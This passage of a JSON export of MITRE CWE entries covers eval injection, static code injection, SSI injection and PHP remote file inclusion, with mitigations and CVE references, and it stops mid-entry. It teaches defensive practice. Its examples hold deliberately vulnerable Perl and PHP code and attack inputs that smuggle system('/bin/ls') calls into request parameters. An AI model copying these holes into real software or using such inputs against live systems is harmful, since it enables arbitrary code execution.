Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Code Injection","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Control Generation of Code (aka \'Code Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Control Generation of Code (\'Code Injection\')","attr":{"@_Date":"2011-03-29"}}]}},"95":{"attr":{"@_ID":"95","@_Name":"Improper Neutralization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \\"eval\\").","Extended_Description":"This may allow an attacker to execute arbitrary code, or at least modify what code can be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If possible, refactor your code so that it does not need to use eval() at all."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Dynamic Code Evaluation (\'Eval Injection\')"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS35-PL","Entry_Name":"Do not invoke the eval form with a string argument","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"35"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 18, "Inline Evaluation", Page 1095"}}},"Notes":{"Note":[{"#text":"Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary.","attr":{"@_Type":"Other"}},{"#text":"This issue is probably under-reported. Most relevant CVEs have been for Perl and PHP, but eval injection applies to most interpreted languages. Javascript eval injection is likely to be heavily under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Direct Dynamic Code Evaluation (\'Eval Injection\')","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Dynamically Evaluated Code (aka \'Eval Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"96":{"attr":{"@_ID":"96","@_Name":"Improper Neutralization of Directives in Statically Saved Code (\'Static Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue is most frequently found in PHP applications that allow users to set configuration variables that are stored within executable PHP files. Technically, this could also be performed in some compiled code (e.g. by byte-patching an executable), although it is highly unlikely."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Perform proper output validation and escaping to neutralize all code syntax from data written to code files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = $_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"<b>$name</b> says \'$message\'<hr>\\\\n\\");fclose($handle);echo \\"Message Saved!<p>\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"<?php system(\\"/bin/ls -l\\");?>"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this situation."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Static Code Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Notes":{"Note":{"#text":"\\"HTML injection\\" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Direct Static Code Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Statically Saved Code (Static Code Injection)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Statically Saved Code (\'Static Code Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"97":{"attr":{"@_ID":"97","@_Name":"Improper Neutralization of Server-Side Includes (SSI) Within a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"96","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Server-Side Includes (SSI) Injection"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":36,"Entry_Name":"SSI Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Server-Side Includes (SSI) Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Server-Side Includes (SSI) Within a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"98":{"attr":{"@_ID":"98","@_Name":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP Remote File Inclusion\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in \\"require,\\" \\"include,\\" or similar functions.","Extended_Description":"In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"94","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"426","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Remote file include"},{"Term":"RFI","Description":"The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers."},{"Term":"Local file inclusion","Description":"This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker\'s control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program.","Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and 